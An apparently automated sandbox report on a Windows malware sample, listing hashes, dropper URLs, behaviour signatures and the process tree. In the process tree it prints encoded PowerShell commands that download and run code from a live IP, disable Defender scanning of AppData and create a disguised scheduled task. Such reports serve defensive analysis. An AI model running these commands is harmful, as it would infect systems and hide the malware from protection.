6a76080cc3b34c768275c7409513aa8870b73d37fbdbe4a50ba4e14f026976f6

General

Target

file.exe
Size

35KB
MD5

d99d4989355a51b4de84df9f5eec9122
SHA1

aff7b79038862d65d22c64b228b64c945f415e0d
SHA256

6a76080cc3b34c768275c7409513aa8870b73d37fbdbe4a50ba4e14f026976f6
SHA512

d81ef4edd11bf9d9facd4633874e0d12d6c4d8451d6813ef1bcb2c58843c2220a6248b6e627e03dbd2bee1edda5a06cc31029fcb6f000288bca8e129ce389d86
SSDEEP

768:0WhNNkg4XVa0V+jCnksy4r/wOPpdwMNhghy0qt:0Wh0FXVa01c4kmTghy0w

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

6 808 powershell.exe
7 1704 powershell.exe
8 1032 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

NoSleep.exe

pid process

1780 NoSleep.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

1032 powershell.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

740 schtasks.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid process

1032 powershell.exe
1704 powershell.exe
808 powershell.exe
1868 powershell.exe
1032 powershell.exe
1032 powershell.exe
1816 conhost.exe

flow	pid	process
6	808	powershell.exe
7	1704	powershell.exe
8	1032	powershell.exe

pid	process
1780	NoSleep.exe

pid	process
1032	powershell.exe

pid	process
740	schtasks.exe

pid	process
1032	powershell.exe
1704	powershell.exe
808	powershell.exe
1868	powershell.exe
1032	powershell.exe
1032	powershell.exe
1816	conhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1816	conhost.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

file.exepowershell.exeNoSleep.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1904 wrote to memory of 1704	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1704	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1704	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1032	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1032	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1032	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 808	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 808	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 808	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1868	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1868	1904	file.exe	powershell.exe
PID 1904 wrote to memory of 1868	1904	file.exe	powershell.exe
PID 1032 wrote to memory of 1780	1032	powershell.exe	NoSleep.exe
PID 1032 wrote to memory of 1780	1032	powershell.exe	NoSleep.exe
PID 1032 wrote to memory of 1780	1032	powershell.exe	NoSleep.exe
PID 1780 wrote to memory of 1816	1780	NoSleep.exe	conhost.exe
PID 1780 wrote to memory of 1816	1780	NoSleep.exe	conhost.exe
PID 1780 wrote to memory of 1816	1780	NoSleep.exe	conhost.exe
PID 1780 wrote to memory of 1816	1780	NoSleep.exe	conhost.exe
PID 1816 wrote to memory of 944	1816	conhost.exe	cmd.exe
PID 1816 wrote to memory of 944	1816	conhost.exe	cmd.exe
PID 1816 wrote to memory of 944	1816	conhost.exe	cmd.exe
PID 1816 wrote to memory of 1712	1816	conhost.exe	cmd.exe
PID 1816 wrote to memory of 1712	1816	conhost.exe	cmd.exe
PID 1816 wrote to memory of 1712	1816	conhost.exe	cmd.exe
PID 944 wrote to memory of 740	944	cmd.exe	schtasks.exe
PID 944 wrote to memory of 740	944	cmd.exe	schtasks.exe
PID 944 wrote to memory of 740	944	cmd.exe	schtasks.exe
PID 1712 wrote to memory of 1028	1712	cmd.exe	schtasks.exe
PID 1712 wrote to memory of 1028	1712	cmd.exe	schtasks.exe
PID 1712 wrote to memory of 1028	1712	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
5⤵
- Suspicious use of WriteProcessMemory
PID:944

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
6⤵
- Creates scheduled task(s)
PID:740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
PID:1028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5269c98ff96a3aff75a9f8f244c56042

SHA1
43ae49fc79b05d0c27d457b9ce804083fdcb0664

SHA256
5accdf4adb7e13773af336d5167fae046b94ad2692ca00b06ae51e7ff40dd689

SHA512
8176568e6166035a1161c377dd295b8a22092f8b6062d441e42757a28751c5e607381c96886334aa21cade08494da423042b3abd27b910dabc23afc60c4d3ea3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5269c98ff96a3aff75a9f8f244c56042

SHA1
43ae49fc79b05d0c27d457b9ce804083fdcb0664

SHA256
5accdf4adb7e13773af336d5167fae046b94ad2692ca00b06ae51e7ff40dd689

SHA512
8176568e6166035a1161c377dd295b8a22092f8b6062d441e42757a28751c5e607381c96886334aa21cade08494da423042b3abd27b910dabc23afc60c4d3ea3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5269c98ff96a3aff75a9f8f244c56042

SHA1
43ae49fc79b05d0c27d457b9ce804083fdcb0664

SHA256
5accdf4adb7e13773af336d5167fae046b94ad2692ca00b06ae51e7ff40dd689

SHA512
8176568e6166035a1161c377dd295b8a22092f8b6062d441e42757a28751c5e607381c96886334aa21cade08494da423042b3abd27b910dabc23afc60c4d3ea3

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
memory/740-105-0x0000000000000000-mapping.dmp

Download
memory/808-108-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/808-57-0x0000000000000000-mapping.dmp

Download
memory/808-75-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/808-67-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

Filesize
10.1MB

Download
memory/808-109-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/808-77-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

Filesize
11.4MB

Download
memory/808-87-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/808-85-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/808-107-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/944-102-0x0000000000000000-mapping.dmp

Download
memory/1028-106-0x0000000000000000-mapping.dmp

Download
memory/1032-79-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

Filesize
3.0MB

Download
memory/1032-98-0x00000000027FB000-0x000000000281A000-memory.dmp

Filesize
124KB

Download
memory/1032-97-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1032-82-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1032-70-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

Filesize
11.4MB

Download
memory/1032-72-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1032-56-0x0000000000000000-mapping.dmp

Download
memory/1032-86-0x00000000027FB000-0x000000000281A000-memory.dmp

Filesize
124KB

Download
memory/1032-64-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

Filesize
10.1MB

Download
memory/1704-73-0x00000000023E4000-0x00000000023E7000-memory.dmp

Filesize
12KB

Download
memory/1704-71-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

Filesize
11.4MB

Download
memory/1704-88-0x00000000023EB000-0x000000000240A000-memory.dmp

Filesize
124KB

Download
memory/1704-78-0x000000001B7E0000-0x000000001BADF000-memory.dmp

Filesize
3.0MB

Download
memory/1704-55-0x0000000000000000-mapping.dmp

Download
memory/1704-59-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp

Filesize
8KB

Download
memory/1704-66-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

Filesize
10.1MB

Download
memory/1704-92-0x00000000023E4000-0x00000000023E7000-memory.dmp

Filesize
12KB

Download
memory/1704-93-0x00000000023EB000-0x000000000240A000-memory.dmp

Filesize
124KB

Download
memory/1704-83-0x00000000023E4000-0x00000000023E7000-memory.dmp

Filesize
12KB

Download
memory/1712-104-0x0000000000000000-mapping.dmp

Download
memory/1780-95-0x0000000000000000-mapping.dmp

Download
memory/1816-100-0x0000000000120000-0x000000000057B000-memory.dmp

Filesize
4.4MB

Download
memory/1816-101-0x000000001BCA0000-0x000000001C0D4000-memory.dmp

Filesize
4.2MB

Download
memory/1816-99-0x000000001B840000-0x000000001BC9C000-memory.dmp

Filesize
4.4MB

Download
memory/1868-81-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/1868-76-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

Filesize
11.4MB

Download
memory/1868-74-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1868-69-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

Filesize
10.1MB

Download
memory/1868-89-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1868-84-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1868-58-0x0000000000000000-mapping.dmp

Download
memory/1868-91-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1868-90-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1904-54-0x0000000000E40000-0x0000000000E50000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads